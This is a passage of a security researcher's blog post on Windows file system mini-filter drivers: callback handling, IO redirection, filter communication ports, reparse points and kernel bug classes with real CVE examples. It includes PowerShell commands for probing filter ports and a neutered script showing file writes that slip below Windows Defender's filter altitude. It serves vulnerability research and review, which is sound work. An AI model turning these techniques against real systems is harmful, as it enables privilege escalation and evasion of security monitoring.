Now that we’ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you’ll find in a driver but omits security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn’t contain the access then the request is completed with no callback.

FLT_PREOP_CALLBACK_STATUS

PreCreateOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    PFLT_IO_PARAMETER_BLOCK ps = &Data->Iopb->Parameters;

    DWORD access = ps->Create.SecurityContext->DesiredAccess;

    if ((access & FILE_WRITE_DATA) == 0) {

        return FLT_PREOP_SUCCESS_NO_CALLBACK;

    }

    // Perform some operation...

}

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specified it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API however all that currently does is set the flag.

Modify the IO request response

As with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system hand encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

FLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data, 

                                        PUNICODE_STRING TargetFileName){

  LuafvSetEcp(Data, TargetFileName);

  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;

  ExFreePool(FileObject->FileName.Buffer);

  FileObject->FileName.Buffer = ExAllocatePool(PagedPool, 

                                        TargetFileName.Length);

  FileObject->FileName.MaximumLength = TargetFileName.Length;

  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);

  Data->IoStatus.Information = 0;

  Data->IoStatus.Status = STATUS_REPARSE;

  FltSetCallbackDataDirty(Data);

  return FLT_POSTOP_FINISHED_PROCESSING;

}

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 a IoReplaceFileObjectName API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn’t exist so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.

Complete the IO request with an error result.

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using FltFindExtraCreateParameter API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.

if (context->FileObject) {

    Data->Iopb->TargetFileObject = context->FileObject;

    FltSetCallbackDataDirty(Data);

    return FLT_PREOP_SUCCESS_NO_CALLBACK;

}

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there's multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

PSECURITY_DESCRIPTOR SecurityDescriptor;

FltBuildDefaultSecurityDescriptor(

  &SecurityDescriptor,

  FLT_PORT_ALL_ACCESS

);

UNICODE_STRING Name;

RtlInitUnicodeString(&Name, L"\\FilterPortName");

OBJECT_ATTRIBUTES ObjAttr;

InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);

PFLT_PORT Port;

FltCreateCommunicationPort(

  Filter,

  &Port,

  &ObjAttr,

  NULL,

  ConnectNotifyCallback,

  DisconnectNotifyCallback,

  MessageNotifyCallback,

  100

);

The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS

(*PFLT_CONNECT_NOTIFY) (

      PFLT_PORT ClientPort,

      PVOID ServerPortCookie,

      PVOID ConnectionContext,

      ULONG SizeOfContext,

      PVOID *ConnectionPortCookie

      );

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName            

----                                      --------            

storqosfltport                            FilterConnectionPort

MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort

MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort

WcifsPort                                 FilterConnectionPort

MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort

BindFltPort                               FilterConnectionPort

MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort

CLDMSGPORT                                FilterConnectionPort

MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ | 

Where-Object TypeName -eq "FilterConnectionPort"

PS> foreach($port in $ports.Name) {

    Write-Host "\$port"

    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}

}

\BindFltPort

Exception: "(0x80070005) - Access is denied."

\CLDMSGPORT

Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

We can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT

Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort

    ObjectHeader: ffffb487447ff890 (new version)

    HandleCount: 1  PointerCount: 4

    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT

0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)

(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0

0: kd> !sd 0xffff8a888dccb0a0 1

->Revision: 0x1

->Sbz1    : 0x0

->Control : 0x9004

            SE_DACL_PRESENT

            SE_DACL_PROTECTED

            SE_SELF_RELATIVE

->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)

->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)

->Dacl    :

->Dacl    : ->AclRevision: 0x2

->Dacl    : ->Sbz1       : 0x0

->Dacl    : ->AclSize    : 0x1c

->Dacl    : ->AceCount   : 0x1

->Dacl    : ->Sbz2       : 0x0

->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE

->Dacl    : ->Ace[0]: ->AceFlags: 0x0

->Dacl    : ->Ace[0]: ->AceSize: 0x14

->Dacl    : ->Ace[0]: ->Mask : 0x001f0001

->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)

->Sacl    :  is NULL

To dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the FilterSendMessage API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

HRESULT FilterSendMessage(

  HANDLE  hPort,

  LPVOID  lpInBuffer,

  DWORD   dwInBufferSize,

  LPVOID  lpOutBuffer,

  DWORD   dwOutBufferSize,

  LPDWORD lpBytesReturned

);

The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter. The callback has the following prototype.

typedef NTSTATUS

(*PFLT_MESSAGE_NOTIFY) (

      IN PVOID PortCookie,

      IN PVOID InputBuffer OPTIONAL,

      IN ULONG InputBufferLength,

      OUT PVOID OutputBuffer OPTIONAL,

      IN ULONG OutputBufferLength,

      OUT PULONG ReturnOutputBufferLength

      );

The handling of the message is similar to a device IO control call. In fact under the hood it’s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method means the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them before calling the callback with ProbeForRead and ProbeForWrite calls.

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100

For the kernel to user messages the user mode application needs to call FilterGetMessage to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the FltSendMessage API which has the following prototype.

NTSTATUS FltSendMessage(

  PFLT_FILTER    Filter,

  PFLT_PORT      *ClientPort,

  PVOID          SenderBuffer,

  ULONG          SenderBufferLength,

  PVOID          ReplyBuffer,

  PULONG         ReplyLength,

  PLARGE_INTEGER Timeout

);

If there’s currently no waiting user mode process the API can wait a specified timeout until the application called FilterGetMessage. The returned buffer from FilterGetMessage contains a FILTER_MESSAGE_HEADER structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the FilterReplyMessage API. The user-mode application needs to append any data to a FILTER_REPLY_HEADER structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.

Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests.  However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is not really supported by any filesystem.

#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILESYSTEM,

                                     0x801,

                                     METHOD_BUFFERED,

                                     FILE_ANY_ACCESS)

FLT_PREOP_CALLBACK_STATUS

PreFsControlOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;

    if (ps->DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {

        return FLT_PREOP_SUCCESS_NO_CALLBACK;

    }

    char* buffer = ps->DeviceIoControl.Buffered.SystemBuffer;

    ULONG length = min(ps->DeviceIoControl.Buffered.InputBufferLength,

        ps->DeviceIoControl.Buffered.OutputBufferLength);

    for (ULONG i = 0; i < length; ++i)

    {

        char tmp = buffer[i];

        buffer[i] = buffer[length - i - 1];

        buffer[length - i - 1] = tmp;

    }

    Data->IoStatus.Status = STATUS_SUCCESS;

    Data->IoStatus.Information = length;

    return FLT_PREOP_COMPLETE;

}

The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it handles correctly all buffer types if it wants to implement its own control codes.

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code FSCTL_SET_EXTERNAL_BACKING is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete using FSCTL control codes, such as FSCTL_SET_REPARSE_POINT. The recommended way a mini-filter driver should set and delete a file’s reparse buffer is through the FltTagFile (and FltTagFileEx) and FltUntagFile APIs to set and remove the reparse buffer. Searching for the driver’s imported APIs should quickly show whether the driver uses its own reparse buffer format.

To open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an OPEN_REPARSE_LIST_ENTRY structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if it’s in the open reparse list. If so instead of returning STATUS_REPARSE the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag is set in the OPEN_REPARSE_LIST_ENTRY structure, the file is opened and success NT status code is returned. The filter driver can then check for the flag in the post-create callback, if set it can query the reparse tag from the file, for example using FSCTL_GET_REPARSE_POINT and handle accordingly.

The filter manager also exposes the FltAddOpenReparseEntry and FltRemoveOpenReparseEntry to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the REPARSE_DATA_BUFFER structure which will be written to the file system by calling the kernel API FsRtlValidateReparsePointBuffer. The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.

Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note, this is not an exhaustive list, I’m sure there are some novel bug classes that I don’t know about which are missing from this list. Which is why it’s good to describe this process in more detail so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from github. I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

Common and garden variety memory safety hazards

Being native C code you can expect the same sorts of issues you’d find in any sizable code base including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, CVE-2018-0877 was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can’t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to ready arbitrary files on disk such as the SAM hive. The technique was described separately in this blog post.

Incorrect RequestorMode Check.

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer to my blog post from last year where I collaborated with Microsoft on related issues.

FLT_PREOP_CALLBACK_STATUS

PreCreateOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, 

                                Data->RequestorMode)) {

        Data->IoStatus.Status = STATUS_ACCESS_DENIED;

        return FLT_PREOP_COMPLETE;

    }

    // Perform some privileged action.

    return FLT_PREOP_SUCCESS_WITH_CALLBACK;

}

The example above shows misuse of the RequestorMode field. It passes it directly to SeSinglePrivilegeCheck, if it indicates the call came from the kernel then the privilege check will always return TRUE meaning the privileged action will be taken. If you read the linked blog post, this can happen if the file is opened through calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.

Driver and Kernel IO Operation Mismatch

The Windows platform is constantly iterating new features, this is even more true since the release of Windows 10 and its six month release cycles. This can introduce new features to the IO stack such as new information classes or IO control codes or additional functionality to existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about. However, if it does process an IO operation it needs to match with what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue CVE-2020-17139 resulted from the OS adding a new FSCTL_SET_REPARSE_POINT_EX IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as Windows Defender Application Control.

Altitude sickness.

Sorry, I couldn’t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you’ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver.

What this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them. Let’s show this in action with a simple PowerShell script.

function Write-EICAR {

    param([string]$Path)

    # Replace with a real EICAR string.

    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")

    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {

        $f.Length = 0

        Write-NtFile $f $eicar -Offset 0

    }

}

PS> Write-EICAR -Path "$env:TEMP\eicar.txt"

PS> Enable-NtTokenVirtualization

PS> Write-EICAR -Path "$env:windir\system32\license.rtf"

The Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.

We create an EICAR file in the temporary folder. Once the file has been closed Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user’s virtual store, we’ve not overwritten license.rtf.

Worth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender’s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.

The mismatch with the filter altitude is also a potential reason you’ll miss file events in Process Monitor. Process Monitor runs its mini-filter to capture file events at altitude 385200 which is above LUAFV. You will not see most direct virtualization events. However we can do something about this, we can use fltmc to detach the Process Monitor filter from a volume and reattach at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.

C:\> fltmc detach PROCMON24 C:

C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100

You might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won’t work as the driver doesn’t indicate support for that device.

Note, that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won’t get deleted, however Process Monitor will show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line options, this would be one of those cases where it’d be useful for this tooling to be open source so that this feature could be added.

As an example before adding the low altitude instance if you create the EICAR test file you’ll see the following events:

ID

Path

Operation

Result

Detail

0

C:\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data, Write Data

1

C:\Windows\System32\license.rtf

SetEndOfFile

SUCCESS

EndOfFile: 0

2

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

WriteFile

SUCCESS

Offset: 0, Length: 68

3

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CloseFile

SUCCESS

I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file, we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is “delay virtualized” so it’ll only be created if a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:

ID

Path

Operation

Result

Detail

0

C:\Windows\System32\license.rtf

CreateFile

ACCESS DENIED

Desired Access: Read Data, Write Data

C:\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data

1

C:\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data, Read Attributes

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Write Data, Write Attributes

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

SetEndOfFile

SUCCESS

EndOfFile: 538

C:\Windows\System32\license.rtf

ReadFile

SUCCESS

Offset: 0, Length: 538

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

WriteFile

SUCCESS

Offset: 0, Length: 538

C:\Windows\System32\license.rtf

ReadFile

END OF FILE

Offset: 538, Length: 16,384

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CloseFile

SUCCESS

C:\Windows\System32\license.rtf

CloseFile

SUCCESS

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CreateFile

SUCCESS

Desired Access: Read Data, Write Data

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

SetEndOfFile

SUCCESS

EndOfFile: 0

2

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

WriteFile

SUCCESS

Offset: 0, Length: 68, Priority: Normal

3

C:\Windows\System32\license.rtf

CloseFile

SUCCESS

C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf

CloseFile

SUCCESS

You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). For event 0 it’s no longer a single create IO request for the license.rtf file. As the user doesn’t have write access when the create call is made to the file system it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and as virtualization is enabled it makes a second create for only read access. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from the Process Monitor.

In the first table event ID 2 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. It’s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.

The filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.

An example of this kind of issue is CVE-2019-0836 which was a race condition in the LUAFV driver related to handling of the SECTION_OBJECT_POINTERS structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.

To solve this problem the driver needs to not maintain complex state between pre and post operation callbacks or over any calls out to any API which could be trapped by a user-mode application.

Incorrect Forwarding of IO Operations

We showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it’ll succeed.

